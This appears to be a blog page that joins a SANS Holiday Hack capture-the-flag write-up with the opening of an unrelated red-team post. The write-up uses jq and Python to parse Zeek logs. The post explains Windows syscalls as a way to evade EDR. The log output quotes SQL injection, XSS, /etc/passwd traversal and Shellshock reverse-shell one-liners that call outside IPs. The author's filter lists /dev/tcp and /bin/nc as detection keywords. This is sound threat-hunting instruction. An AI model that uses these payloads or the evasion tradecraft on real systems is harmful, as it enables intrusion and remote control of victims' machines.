Once we know this, we can then navigate to the eleventh objective in our badge and enter The Tooth Fairy to complete the objective!

Now that we broke into the crate, we can talk to Shinny Upatree to learn more about the crate and The Tooth Fairy’s plot.

Objective 12

Zeek JSON Analysis - CranPi

After completing objective 11 and gaining access to the Sleigh Shop, the second we walk into the room we spot the Tooth Fairy!

Talking to her we learn why she did what she did.

National Tooth Fairy Day being the most popular? Yah, I don’t know how that’s going to really work out for all of us here. Ahhh… enough talking, we need to go save Santa and help his sleigh! Think of the children!

Inside the Sleigh Shop, past the Tooth Fairy we will come across Wunorse Opensale.

Upon talking with Wunorse, we learn that he’s looking though some zeek logs where he believes there’s a malicious C2 channel and he needs our help to find it.

Wunorse also tells us that we should use jq to find the longest connection time, and also provides us a hint about parsing Zeek JSON Logs with JQ.

After we read all that information, let’s access the terminal and see what we have to work with.

Some JSON files can get quite busy.
There's lots to see and do.
Does C&C lurk in our data?
JQ's the tool for you!

-Wunorse Openslae

Identify the destination IP address with the longest connection duration
using the supplied Zeek logfile. Run runtoanswer to submit your answer.

elf@48b87992755c:~$

Alright, so as we figured out before. We need to parse the zeek logs with jq and find the IP address with the longest connection time. Seems easy enough! Let’s see where our log file is.

elf@48b87992755c:~$ ls
conn.log
elf@48b87992755c:~$ head -n 1 conn.log 
{"ts":"2019-04-04T20:34:24.698965Z","uid":"CAFvAu2l50Km67tSP5","id.orig_h":"192.168.144.130","id.orig_p":64277,"id.resp_h":"192.168.144.2","id.resp_p":53,"proto":"udp","service":"dns","duration":0.320463,"orig_bytes":94,"resp_bytes":316,"conn_state":"SF","missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":150,"resp_pkts":2,"resp_ip_bytes":372}

After reading the first event of the log, we see that there is a ton of data, and since it’s JSON, it’s messy. So, let’s pipe this into jq for better readability.

elf@48b87992755c:~$ head -n 1 conn.log | jq
{
  "ts": "2019-04-04T20:34:24.698965Z",
  "uid": "CAFvAu2l50Km67tSP5",
  "id.orig_h": "192.168.144.130",
  "id.orig_p": 64277,
  "id.resp_h": "192.168.144.2",
  "id.resp_p": 53,
  "proto": "udp",
  "service": "dns",
  "duration": 0.320463,
  "orig_bytes": 94,
  "resp_bytes": 316,
  "conn_state": "SF",
  "missed_bytes": 0,
  "history": "Dd",
  "orig_pkts": 2,
  "orig_ip_bytes": 150,
  "resp_pkts": 2,
  "resp_ip_bytes": 372
}

Much better! I used head -1 here just to look at the first conn.log record. The zeek log event summarizes the connection including source and destination addresses, ports, protocol (TCP, UDP, or ICMP), service (DNS, HTTP, etc.), packets transferred, bytes exchanged, and more.

This is great and all, but we should really focus on the duration variable.

If you read through the hints provided to us, then you would have learned that with JQ you can select specific records from the Zeek log in your query. So for us to obtain the duration value for all connections, we just need to pass the '.duration' argument.

elf@48b87992755c:~$ head -n 10 conn.log | jq '.duration'
0.320463
0.000602
0.000923
0.00061
0.000602
0.00106
0.271645
0.000756
0.001645
0.001305

Awesome! The duration seems to be in decimal format, so we can attempt to sort all this data to find the longest connection. Simply using sort will not suffice, as it will not sort decimals properly. We will have to use the sort -V command to sort β€œversions” as this will better sort decimal values.

So let’s grab the top 10 longest connection from our zeek logs.

elf@48b87992755c:~$ cat conn.log | jq '.duration' | sort -r -V | grep -v "null" | head -n 10
1019365.337758
465105.432156
250451.490735
148943.160634
59396.15014
33074.076209
31642.774949
30493.79543
4333.288236
870.55667

So, we have the longest duration being about 1019365 seconds long, but we don’t know what kind of IP that’s for!

Well don’t you worry! Luckily for us the JQ select function allows us to perform a boolean operation on an identified field, returning the record if the operation returns true. We can use this to our advantage by selecting all of the records where the duration is equal to that of the highest duration, like so.

elf@48b87992755c:~$ cat conn.log | jq 'select(.duration == 1019365.337758)'
{
  "ts": "2019-04-18T21:27:45.402479Z",
  "uid": "CmYAZn10sInxVD5WWd",
  "id.orig_h": "192.168.52.132",
  "id.orig_p": 8,
  "id.resp_h": "13.107.21.200",
  "id.resp_p": 0,
  "proto": "icmp",
  "duration": 1019365.337758,
  "orig_bytes": 30781920,
  "resp_bytes": 30382240,
  "conn_state": "OTH",
  "missed_bytes": 0,
  "orig_pkts": 961935,
  "orig_ip_bytes": 57716100,
  "resp_pkts": 949445,
  "resp_ip_bytes": 56966700
}

After running that it seems the possible C2 IP us that of 13.107.21.200. We can now execute the runtoanswer command and see if we are right.

elf@48b87992755c:~$ runtoanswer 
Loading, please wait......



What is the destination IP address with the longest connection duration? 13.107.21.200



Thank you for your analysis, you are spot-on.
I would have been working on that until the early dawn.
Now that you know the features of jq,
You'll be able to answer other challenges too.

-Wunorse Openslae

Congratulations!

And there we have it, we helped Wunorse find the C2 IP!

Filter Out Poisoned Sources of Weather Data

Upon successfully completing the Zeek JSON Analysis CranPI, we can talk to Wunorse again for more hints that will allow us to complete the next objective.

Oh no, we have a big problem on our hands! It seems someone is forging false weather data which is causing issues for Santa’s sleigh route!

For this objective, we’re supposed to use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. We must then block the 100 offending sources of information to guide Santa’s sleigh through the attack.

It seems simply enough, but how do we know what’s bad data and what’s good data? Well if we paid attention to Wunorse, he mentioned something about seeing LFI, XSS, Shellshock, and SQLi in the Zeek logs. Unfortuantly for us, it seems Wunorse forgot the login as well… oh man.

Either way, this is a great starting point, since we already worked with Zeek logs and jq, this should be pretty easy for us!

Alright, so with a starting point, let’s try and access the the Sleight Route Finder API and see what we have to work with.

Ahh darn, we need that login to move on further! Let’s see… think, think. What can we do?

Oh yes, that’s right! Remember how we decrypted that Sleight Route Finder document back in objective 10? Well let’s look into that PDF to see if we get any hints!

if we scroll though, we should find information about the default credentials!

So it seems that the credentials are in the readme in the ElfU Research Labs git repository, which we have no clue where it is.

Okay, hold on. We have the Zeek logs, so let’s download them and parse the data to see if we can’t find a URL to readme.

NOTE: Since the Zeek logs provided to us are nested in an array ([]), we need to use .[] followed by the value we want to search when using jq to properly parse the data.

root@kali:~/HH/sleigh_route# wget https://downloads.elfu.org/http.log.gz
--2020-01-04 19:46:42--  https://downloads.elfu.org/http.log.gz
Resolving downloads.elfu.org (downloads.elfu.org)... 45.79.14.68
Connecting to downloads.elfu.org (downloads.elfu.org)|45.79.14.68|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4499255 (4.3M) [application/octet-stream]
Saving to: β€˜http.log.gz’

http.log.gz                               100%[=====================================================================================>]   4.29M  9.14MB/s    in 0.5s    

2020-01-04 19:46:43 (9.14 MB/s) - β€˜http.log.gz’ saved [4499255/4499255]

root@kali:~/HH/sleigh_route# ls
http.log.gz
root@kali:~/HH/sleigh_route# gzip -d http.log.gz 
root@kali:~/HH/sleigh_route# ls
http.log

root@kali:~/HH/sleigh_route# cat http.log | jq '.[].uri' | grep "README"
"/README.md"
"/README/"
"/cgi-bin/README.TXT"

Awesome, we found a README.md file, which usually appears in all git repositories. Let’s see if we can navigate to that URL in the browser.

Perfect, we found some credentials! Using these credentials we can now log into the application.

Once in the application, we can navigate to the Firewall section and there we will see where we can enter the offending IP’s. Right, so let’s get to work and start looking for bad data!

First, let’s see what kind of values we have to work with in the Zeek logs. This will give us a better idea of what we can use to query for malicious data.

root@kali:~/HH/sleigh_route# head -1 http.log | jq
[
  {
    "ts": "2019-10-05T06:50:42-0800",
    "uid": "ClRV8h1vYKWXN1G5ke",
    "id.orig_h": "238.27.231.56",
    "id.orig_p": 60677,
    "id.resp_h": "10.20.3.80",
    "id.resp_p": 80,
    "trans_depth": 1,
    "method": "GET",
    "host": "srf.elfu.org",
    "uri": "/14.10/Google/",
    "referrer": "-",
    "version": "1.0",
    "user_agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)",
    "origin": "-",
    "request_body_len": 0,
    "response_body_len": 232,
    "status_code": 404,
    "status_msg": "Not Found",
    "info_code": "-",
    "info_msg": "-",
    "tags": "(empty)",
    "username": "-",
    "password": "-",
    "proxied": "-",
    "orig_fuids": "-",
    "orig_filenames": "-",
    "orig_mime_types": "-",
    "resp_fuids": "FUPWLQXTNsTNvf33",
    "resp_filenames": "-",
    "resp_mime_types": "text/html"
  },

That’s a lot of data we can parse! We have everything from User Agents, to the URI, to even the username and password. We know that there might have been some SQL Injection attacks, so let’s parse the username field using jq to see if there was any SQL Injection attempts.

root@kali:~/HH/sleigh_route# cat http.log | jq '.[].username' | grep -v "-"
"q1ki9"
"servlet"
"support"
"admin"
"Admin"
"admin"
"admin"
"q1ki9"
"6666"
"6666"
"6666"
"' or '1=1"
"' or '1=1"
"' or '1=1"
"' or '1=1"
"root"
"comcomcom"
"(empty)"
"(empty)"
"(empty)"
"admin"

Okay, so we found some sql injection attacks, but we need to find the IP that’s associated with that attack. So, using some jq magic, we can join our queries in jq using the -j parameter followed by the value we want.

If you’re confused on how to use jq, then I suggest going back and reading β€œParsing Zeek JSON Logs with JQ” which was provided to us by Wunorse as a hint.

root@kali:~/HH/sleigh_route# cat http.log | jq -j '.[] | .username, ", ", .["id.orig_h"], "\n"' | grep -v "-"
q1ki9, 191.85.145.190
servlet, 142.115.169.193
support, 9.95.164.154
admin, 40.213.20.94
Admin, 88.78.129.76
admin, 75.172.126.182
admin, 168.145.213.152
q1ki9, 248.150.13.189
6666, 98.69.67.75
6666, 104.82.104.120
6666, 208.14.190.102
' or '1=1, 33.132.98.193
' or '1=1, 84.185.44.166
' or '1=1, 254.140.181.172
' or '1=1, 150.50.77.238
root, 241.226.125.123
comcomcom, 135.118.158.216
(empty), 11.82.10.31
(empty), 187.100.107.131
(empty), 234.119.70.73
admin, 188.127.212.14
(empty), 216.225.250.249

Alright, we found some bad IP’s, let’s save those to a list for safe keeping!

Now let’s stop here for a second. Doing all of these queries manually against all the values, and trying to search for different attacks one at a time is going to be very tedious. What we need to do is create some sort of query and script that will iterate though all the possible keys in the Zeek logs, and run a jq query that will look for everything from SQL to Shellshock.

And that’s exactly what I did. After some time spent writing the query, mines looked something like so.

cat http.log | jq -r '.[] | select(.user_agent | contains ("%") 
or contains ("/etc/") 
or contains ("UNION") 
or contains ("SELECT") 
or contains ("{ :; }") 
or contains ("alert(")  
or contains ("../") 
or contains ("onerror") 
or contains ("onload") 
or contains ("base64") 
or contains ("/dev/tcp") 
or contains ("sock") 
or contains ("/bin/nc") 
or contains ("/bash"))' | jq -j '(.user_agent, ", IP: ", .["id.orig_h"], "\n")'

Nice we have a decent query! This one should get us a lot of data from the user_agent key, but I want to enumerate though all the keys. So let’s parse the keys from the Zeek logs, and save them to a file.

root@kali:~/HH/sleigh_route# cat http.log | jq '.[] | keys'
[
  "host",
  "id.orig_h",
  "id.orig_p",
  "id.resp_h",
  "id.resp_p",
  "info_code",
  "info_msg",
  "method",
  "orig_filenames",
  "orig_fuids",
  "orig_mime_types",
  "origin",
  "password",
  "proxied",
  "referrer",
  "request_body_len",
  "resp_filenames",
  "resp_fuids",
  "resp_mime_types",
  "response_body_len",
  "status_code",
  "status_msg",
  "tags",
  "trans_depth",
  "ts",
  "uid",
  "uri",
  "user_agent",
  "username",
  "version"
]

Once we clean up the keys, save them in a list. For me, I saved them in a file called keys.txt.

Now, using python, let’s write a short script that will iterate though all the keys, select them, run the search query, and then finally print out the malicious data along with its IP.

The script will look like so.

import os

f = open('keys.txt')
for line in f:
	command = 'cat http.log | jq -r \'.[] | select(.["' + line.strip() + '"]| contains ("%") or contains ("/etc/") or contains ("UNION") or contains ("SELECT") or contains ("{ :; }") or contains ("alert(")  or contains ("../") or contains ("onerror") or contains ("onload") or contains ("RookIE") or contains ("WinInet") or contains ("CholTBAgent") or contains ("Metasploit") or contains ("Windos") or contains ("avdscan") or contains ("automatedscanning") or contains ("1=1") or contains ("base64") or contains ("/dev/tcp") or contains ("sock") or contains ("/bin/nc") or contains ("/bash"))\' | jq -j \'(.["' + line.strip() + '"], ", IP: ", .["id.orig_h"], "\\n")\''
	os.system(command)

Upon executing the script, we should get the following output:

root@kali:~/HH/sleigh_route# python3 run.py 
<script>alert(\"automatedscanning\");</script>, IP: 61.110.82.125
<script>alert(automatedscanning)</script>, IP: 65.153.114.120
<script>alert('automatedscanning');</script>&action=item, IP: 123.127.233.97
<script>alert(\"automatedscanning\");</script>&from=add, IP: 95.166.116.45
<script>alert('automatedscanning');</script>&function=search, IP: 80.244.147.207
<script>alert(\"automatedscanning\")</script><img src=\", IP: 168.66.108.62
<script>alert(\"avdscan-681165131\");d(', IP: 200.75.228.240
/api/weather?station_id=1' UNION SELECT NULL,NULL,NULL--, IP: 42.103.246.250
/logout?id=<script>alert(1400620032)</script>&ref_a=avdsscanning\"><script>alert(1536286186)</script>, IP: 56.5.47.137
/api/weather?station_id=<script>alert(1)</script>.html, IP: 19.235.69.221
/api/measurements?station_id=<script>alert(60602325)</script>, IP: 69.221.145.150
/api/weather?station_id=<script>alert(autmatedsacnningist)</script>, IP: 42.191.112.181
/api/weather?station_id=<script>alert(automatedscaning)</script>, IP: 48.66.193.176
/api/stations?station_id=<script>alert('automatedscanning')</script>, IP: 49.161.8.58
/api/weather?station_id=<script>alert('automatedscanning');</script>, IP: 84.147.231.129
/api/stations?station_id=<script>alert(\"automatedscanning\")</script>, IP: 44.74.106.131
/api/weather?station_id=<script>alert(\"automatedscanning\")</script>;, IP: 106.93.213.219
/api/weather?station_id=1' UNION SELECT 0,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM xmas_users WHERE 1, IP: 2.230.60.70
/logout?id=1' UNION SELECT null,null,'autosc','autoscan',null,null,null,null,null,null,null,null/*, IP: 10.155.246.29
/api/weather?station_id=1' UNION/**/SELECT 302590057/*, IP: 225.191.220.138
/logout?id=1' UNION/**/SELECT 1223209983/*, IP: 75.73.228.192
/api/login?id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, IP: 249.34.9.16
/api/weather?station_id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16, IP: 27.88.56.114
/api/weather?station_id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16, IP: 238.143.78.114
/api/weather?station_id=1' UNION+SELECT+1,1416442047, IP: 121.7.186.163
/api/stations?station_id=1' UNION SELECT 1,'automatedscanning','5e0bd03bec244039678f2b955a2595aa','',0,'',''/*&password=MoAOWs, IP: 106.132.195.153
/api/weather?station_id=1' UNION SELECT 2,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&file=index&pass=, IP: 129.121.121.48
/api/weather?station_id=1' UNION SELECT 1434719383,1857542197 --, IP: 190.245.228.38
/api/measurements?station_id=1' UNION SELECT 1434719383,1857542197 --, IP: 34.129.179.28
/api/stations?station_id=1' UNION SELECT 1,2,'automatedscanning',4,5,6,7,8,9,10,11,12,13/*, IP: 135.32.99.116
/api/weather?station_id=1' UNION/**/SELECT/**/2015889686,1,288214646/*, IP: 2.240.116.254
/api/weather?station_id=1' UNION/**/SELECT/**/850335112,1,1231437076/*, IP: 45.239.232.245
/api/weather?station_id="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd, IP: 102.143.16.184
/sockets/, IP: 115.98.64.96
/api/weather?station_id=../../../../../../../../../../bin/cat /etc/passwd\\x00|, IP: 230.246.50.221
/api/stations?station_id=|cat /etc/passwd|, IP: 131.186.145.73
/api/weather?station_id=;cat /etc/passwd, IP: 253.182.102.55
/api/login?id=cat /etc/passwd||, IP: 229.133.163.235
/api/weather?station_id=`/etc/passwd`, IP: 23.49.177.78
/api/weather?station_id=/../../../../../../../../../../../etc/passwd, IP: 223.149.180.133
/api/login?id=/../../../../../../../../../etc/passwd, IP: 187.178.169.123
/api/weather?station_id=/../../../../../../../../etc/passwd, IP: 116.116.98.205
/api/weather?station_id=/etc/passwd, IP: 9.206.212.33
/api/login?id=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd, IP: 28.169.41.122
/cgi-bin/bash, IP: 56.147.40.116
Mozilla/4.0 (compatible; MSIE 7.0; Windos NT 6.0), IP: 48.66.193.176
Mozilla/4.0 (compatible; MSIE 7.0; Windos NT 6.0), IP: 22.34.153.164
Mozilla/4.0 (compatible; Metasploit RSPEC), IP: 203.68.29.5
Mozilla/4.0 (compatible; Metasploit RSPEC), IP: 84.147.231.129
CholTBAgent, IP: 135.32.99.116
CholTBAgent, IP: 103.235.93.133
Mozilla/5.0 WinInet, IP: 2.240.116.254
Mozilla/5.0 WinInet, IP: 253.65.40.39
RookIE/1.0, IP: 45.239.232.245
RookIE/1.0, IP: 142.128.135.10
1' UNION SELECT 1,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x6e,0x69,0x6e,0x67,,3,4,5,6,7,8 -- ', IP: 68.115.251.76
1' UNION SELECT 1,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x6e,0x69,0x6e,0x67,,3,4,5,6,7,8 -- ', IP: 118.196.230.170
1' UNION SELECT 1,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x6e,0x69,0x6e,0x67,,3,4,5,6,7,8 -- ', IP: 173.37.160.150
1' UNION SELECT 1,1409605378,1,1,1,1,1,1,1,1/*&blogId=1, IP: 81.14.204.154
1' UNION/**/SELECT/**/994320606,1,1,1,1,1,1,1/*&blogId=1, IP: 135.203.243.43
1' UNION SELECT 1729540636,concat(0x61,0x76,0x64,0x73,0x73,0x63,0x61,0x6e,0x65,0x72, --, IP: 186.28.46.179
1' UNION SELECT -1,'autosc','test','O:8:\"stdClass\":3:{s:3:\"mod\";s:15:\"resourcesmodule\";s:3:\"src\";s:20:\"@random41940ceb78dbb\";s:3:\"int\";s:0:\"\";}',7,0,0,0,0,0,0 /*, IP: 13.39.153.254
1' UNION SELECT '1','2','automatedscanning','1233627891','5'/*, IP: 111.81.145.191
1' UNION/**/SELECT/**/1,2,434635502,4/*&blog=1, IP: 0.216.249.31
() { :; }; /bin/bash -i >& /dev/tcp/31.254.228.4/48051 0>&1, IP: 31.254.228.4
() { :; }; /bin/bash -c '/bin/nc 55535 220.132.33.81 -e /bin/bash', IP: 220.132.33.81
() { :; }; /usr/bin/perl -e 'use Socket;$i="83.0.8.119";$p=57432;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};', IP: 83.0.8.119
() { :; }; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.45.133.97",54611));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);', IP: 150.45.133.97
() { :; }; /usr/bin/php -r '$sock=fsockopen("229.229.189.246",62570);exec("/bin/sh -i <&3 >&3 2>&3");', IP: 229.229.189.246
() { :; }; /usr/bin/ruby -rsocket -e'f=TCPSocket.open("227.110.45.126",43870).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)', IP: 227.110.45.126
' or '1=1, IP: 33.132.98.193
' or '1=1, IP: 84.185.44.166
' or '1=1, IP: 254.140.181.172
' or '1=1, IP: 150.50.77.238

Awesome, so it seems we have ~68 malicious IP’s, but that’s not enough - the objective said we need at least 100. Well hold on, let’s think back to the talk with Wunorse.

If you remember correctly, he said something about β€œpivoting off other unusual attributes”. What can this mean? Well, by attributes I’m assuming the values in the Zeek log. Since we have a list of malicious IPs’ that were attacking the servers, what we can do is search for these IP’s and grab their User Agents.

If whatever tool they used was the same and was just using a round robin style proxy, then their user agents will be a dead giveaway for other malicious IPs. With that, let’s modify our python script to search for the user agents.

import os

f = open('malicious_ips.txt')
for line in f:
	command = 'cat http.log | jq -r \'.[] | select(.["id.orig_h"] | contains ("'+line.strip()+'"))\' | jq -j \'(.["id.orig_h"], ", UA: ", .["user_agent"], "\\n")\''
	os.system(command)

Executing that script should give us the something similar to the following results:

root@kali:~/HH/sleigh_route# python3 run.py 
61.110.82.125, UA: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.1
65.153.114.120, UA: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.0 Mobile/14E5239e Safari/602.1
123.127.233.97, UA: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12
95.166.116.45, UA: Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
80.244.147.207, UA: Mozilla/5.0 (Linux; U; Android 4.1.1; en-gb; Build/KLP) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
168.66.108.62, UA: Mozilla/5.0 (Linux; Android 5.1.1; Nexus 5 Build/LMY48B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.65 Mobile Safari/537.36
200.75.228.240, UA: Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
42.103.246.250, UA: Mozilla/4.0 (compatible;MSIe 7.0;Windows NT 5.1)
56.5.47.137, UA: HttpBrowser/1.0
---snip---

Now that we have a list of malicious user agents, let’s clean them up, and save them to an new list. Once done, let’s go ahead and re-write our script to parse the user agents and get other IP’s.

The final script should look like the following:

import os

f = open('malicious_agents.txt')
for line in f:
	command = 'cat http.log | jq -r \'.[] | select(.["user_agent"] | contains ("'+line.strip()+'"))\' | jq -j \'(.["id.orig_h"], "\\n")\''
	os.system(command)

Once again, we execute the script and get an output similar to the one below:

root@kali:~/HH/sleigh_route# python3 run.py 
61.110.82.125
65.153.114.120
123.127.233.97
95.166.116.45
80.244.147.207
168.66.108.62
200.75.228.240
42.103.246.250
42.103.246.130
42.103.246.130
42.103.246.130
42.103.246.130
56.5.47.137
118.26.57.38
---snip---

There seems to be a lot of duplicates, but don’t worry! Just add all these IP’s to the previous list of malicious IPs’, and sort by unique! Once that’s done, we should have about 166 possible malicious IP’s.

root@kali:~/HH/sleigh_route# cat malicious_ips.txt | wc -l
166

With that, let’s add the IP’s to the firewall, and press DENY. If done correctly, we should block most of the malicious IP’s and help Santa get a proper route!

Once completed, we can navigate to the twelfth objective in our badge, and enter the RID of 0807198508261964 to complete the challenge!

Upon completing the objective, the door to the Bell Tower should now open for us.

Once we enter the Bell Tower, we spot Santa, Krampus and The Tooth Fairy!

Upon talking to Santa, we learn that we finally helped stop the sinister plot set out by the Tooth Fairy!

Hooray! We completed this year’s Holiday Hack, and what a learning adventure it has been!

Closing

As always, SANS has done an amazing job for this year’s Holiday Hack! Especially since this year was way more blue team and defender focused, allowing us to learn about threat hunting and tools like Splunk.

Now just because this was geared more for the Blue Team, the Red Team learned a lot from this too. We now know how our attacks are detected and the kind of work we need to put in to avoid detection!

I’m really looking forward to next year’s challenge!

Cheers everyone, thanks for reading!

Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge

14 April 2020 at 00:00

Over the past year, the security community - specifically Red Team Operators and Blue Team Defenders - have seen a massive rise in both public and private utilization of System Calls in windows malware for post-exploitation activities, as well as for the bypassing of EDR or Endpoint Detection and Response.

Now, to some, the utilization of this technique might seem foreign and brand new, but that’s not really the case. Many malware authors, developers, and even game hackers have been utilizing system calls and in memory loading for years. with the initial goal of bypassing certain restrictions and securities put into place by tools such as anti-virus and anti-cheat engines.

A good example of how these syscall techniques can be utilized were presented in a few blog posts, such as - how to Bypass EDR’s Memory Protection, Introduction to Hooking by Hoang Bui and the greatest example of them all - Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR by Cneelis which initially focused on utilizing syscalls to dump LSASS undetected. As a Red Teamer, the usage of these techniques were critical to covert operations - as it allowed us to carry out post exploitation activities within networks while staying under the radar.

Implementation of these techniques were mostly done in C++ as to easily interact with the Win32 API and the system. But, there was always one caveat to writing tools in C++ and that’s the fact that when our code compiled, we had an EXE. Now for covert operations to succeed, we as a operators always wanted to avoid having to β€œtouch the disk” - meaning that we didn’t want to blindly copy and execute files on the system. What we needed, was to find a way to inject these tools into memory which were more OPSEC (Operational Security) safe.

While C++ is an amazing language for anything malware related, I seriously started to look at attempting to integrate syscalls into C# as some of my post-exploitation tools began transition toward that direction. This accomplishment became more desirable to me after FuzzySec and The Wover released their BlueHatIL 2020 talk - Staying # and Bringing Covert Injection Tradecraft to .NET.

After some painstaking research, failed trial attempts, long sleepless nights, and a lot of coffee - I finally succeed in getting syscalls to work in C#. While the technique itself was beneficial to covert operations, the code itself was somewhat cumbersome - you’ll understand why later.

Overall, the point of this blog post series will be to explore how we can use direct system calls in C# by utilizing unmanaged code to bypass EDR and API Hooking.

But, before we can start writing the code to do that, we must first understand some basic concepts. Such as how system calls work, and some .NET internals - specifically managed vs unmanaged code, P/Invoke, and delegates. Understanding these basics will really help us in understanding how and why our C# code works.

Alright, enough of my ramblings - let’s get into the basics!

Understanding System Calls

In Windows, the process architecture is split between two processor access modes - user mode and kernel mode. The idea behind the implementation of these modes was to protect user applications from accessing and modifying any critical OS data. User applications such as Chrome, Word, etc. all run in user mode, whereas OS code such as the system services and device drivers all run in kernel mode.

The kernel mode specifically refers to a mode of execution in a processor that grants access to all system memory and all CPU instructions. Some x86 and x64 processors differentiate between these modes by using another term known as ring levels.

Processors that utilize the ring level privilege mode define four privilege levels - other known as rings - to protect system code and data. An example of these ring levels can be seen below.

Within Windows, Windows only utilizes two of these rings - Ring 0 for kernel mode and Ring 3 for user mode. Now, during normal processor operations, the processor will switch between these two modes depending on what type of code is running on the processor.

So what’s the reason behind this β€œring level” of security? Well, when you start a user-mode application, windows will create a new process for the application and will provide that application with a private virtual address space and a private handle table.

This β€œhandle table” is a kernel object that contains handles. Handles are simply an abstract reference value to specific system resources, such as a memory region or location, an open file, or a pipe. It’s initial goal is to hides a real memory address from the API user, thus allowing the system to carry out certain management functions like reorganize physical memory.

Overall, a handles job is to tasks internal structures, such as: Tokens, Processes, Threads, and more. An example of a handle can be seen below.

Because an applications virtual address space is private, one application can’t alter the data that belongs to another application - unless the process makes part of its private address space available as a shared memory section via file mapping or via the VirtualProtect function, or unless one process has the right to open another process to use cross-process memory functions, such as ReadProcessMemory and WriteProcessMemory.

Now, unlike user mode, all the code that runs in kernel mode shares a single virtual address space called system space. This means that the kernel-mode drivers are not isolated from other drivers and the operating system itself. So if a driver accidentally writes to the wrong address space or does something malicious, then it can compromise the system or the other drivers. Although there are protections in place to prevent messing with the OS - like Kernel Patch Protection aka Patch Guard, but let’s not worry about these.

Since the kernel houses most of the internal data structures of the operating system (such as the handle tables) anytime a user mode application needs to access these data structures or needs to call an internal Windows routine to carry out a privileged operation (such as reading a file), then it must first switch from user mode to kernel mode. This is where system calls come into play.

For a user application to access these data structures in kernel mode, the process utilizes a special processor instruction trigger called a β€œsyscall”. This instruction triggers the transition between the processor access modes and allows the processor to access the system service dispatching code in the kernel. This in turn calls the appropriate internal function in Ntoskrnl.exe or Win32k.sys which house the kernel and OS application level logic.

An example of this β€œswitch” can be observed in any application. For example, by utilizing Process Monitor on Notepad - we can view specific Read/Write operation properties and their call stack.

In the image above, we can see the switch from user mode to kernel mode. Notice how the Win32 API CreateFile function call follows directly before the Native API NtCreateFile call.

But, if we pay close attention we will see something odd. Notice how there are two different NtCreateFile function calls. One from the ntdll.dll module and one from the ntoskrnl.exe module. Why is that?

Well, the answer is pretty simple. The ntdll.dll DLL exports the Windows Native API. These native APIs from ntdll are implemented in ntoskrnl - you can view these as being the β€œkernel APIs”. Ntdll specifically supports functions and system service dispatch stubs that are used for executive functions.

Simply put, they house the β€œsyscall” logic that allows us to transition our processor from user mode to kernel mode!

So how does this syscall CPU instruction actually look like in ntdll? Well, for us to inspect this, we can utilize WinDBG to disassemble and inspect the call functions in ntdll.

Let’s begin by starting WinDBG and opening up a process like notepad or cmd. Once done, in the command window, type the following:

x ntdll!NtCreateFile

This simply tells WinDBG that we want to examine (x) the NtCreateFile symbol within the loaded ntdll module. After executing the command, you should see the following output.

00007ffd`7885cb50 ntdll!NtCreateFile (NtCreateFile)

The output provided to us is the memory address of where NtCreateFile is in the loaded process. From here to view the disassembly, type the following command:

u 00007ffd`7885cb50

This command tells WinDBG that we want to unassemble (u) the instructions at the beginning of the memory range specified. If ran correctly, we should now see the following output.

Overall the NtCreateFile function from ntdll is first responsible for setting up the functions call arguments on the stack. Once done, the function then needs to move it’s relevant system call number into eax as seen by the 2nd instruction mov eax, 55. In this case the syscall number for NtCreateFile is 0x55.

Each native function has a specific syscall number. Now these number tend to change every update - so at times it’s very hard to keep up with them. But thanks to j00ru from Google Project Zero, he constantly updates his Windows X86-64 System Call Table, so you can use that as a reference anytime a new update comes out.

After the syscall number has been moved into eax, the syscall instruction is then called. Here is where the CPU will jump into kernel mode and carry out the specified privileged operation.

To do so it will copy the function calls arguments from the user mode stack into the kernel mode stack. It then executes the kernel version of the function call, which will be ZwCreateFile. Once finished, the routine is reversed and all return values will be returned to the user mode application. Our syscall is now complete!

Using Direct System Calls

